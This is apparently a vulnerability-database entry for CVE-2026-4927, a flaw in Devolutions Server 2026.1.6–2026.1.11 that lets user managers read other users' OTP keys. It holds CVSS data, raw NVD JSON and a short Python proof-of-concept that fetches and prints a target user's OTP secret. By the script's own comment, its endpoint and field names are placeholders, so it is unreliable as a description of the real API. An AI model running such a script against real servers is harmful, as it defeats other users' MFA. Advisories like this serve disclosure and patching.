Security Vulnerability Report
CVE-2026-4927 CVSS 6.5 MEDIUM

Published: 2026-04-01 16:23:52
Last Modified: 2026-04-03 19:14:04

Description

Exposure of sensitive information in the users' MFA feature in Devolutions Server allows users with user management privileges to obtain other users' OTP keys via an authenticated API request. This issue affects Server: from 2026.1.6 through 2026.1.11.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:* - VULNERABLE
Devolutions Server 2026.1.6
Devolutions Server 2026.1.7
Devolutions Server 2026.1.8
Devolutions Server 2026.1.9
Devolutions Server 2026.1.10
Devolutions Server 2026.1.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# Target URL (Example)
base_url = "https://target-server.com"
# Endpoint path and response field names below are placeholders; this page does not specify them.
api_endpoint = "/api/v1/users/{user_id}/mfa"

# Attacker's credentials with user management privileges
auth_token = "ATTACKER_JWT_TOKEN"
headers = {
    "Authorization": f"Bearer {auth_token}",
    "Content-Type": "application/json"
}

# Target user ID to compromise
target_user_id = "12345"

try:
    # Send authenticated API request to fetch MFA settings
    response = requests.get(
        f"{base_url}{api_endpoint.format(user_id=target_user_id)}",
        headers=headers,
        verify=False
    )
    if response.status_code == 200:
        data = response.json()
        # Extract the sensitive OTP key from the response
        otp_secret = data.get('otpSecret') or data.get('mfa_secret')
        if otp_secret:
            print(f"[+] Successfully leaked OTP Key for user {target_user_id}: {otp_secret}")
        else:
            print("[-] OTP Key not found in response.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")
```

References

https://devolutions.net/security/advisories/DEVO-2026-0010 (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-4927",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-01T16:23:51.870",
    "lastModified": "2026-04-03T19:14:03.653",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Exposure of sensitive information in the users MFA feature in Devolutions Server allows users with user management privileges to obtain other users OTP keys via an authenticated API request.\n\n\n\nThis issue affects Server: from 2026.1.6 through 2026.1.11."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-201"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "2026.1.6.0",
                "versionEndExcluding": "2026.1.12.0",
                "matchCriteriaId": "C03E8B95-397C-465C-BE01-810DC9852675"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://devolutions.net/security/advisories/DEVO-2026-0010",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}
```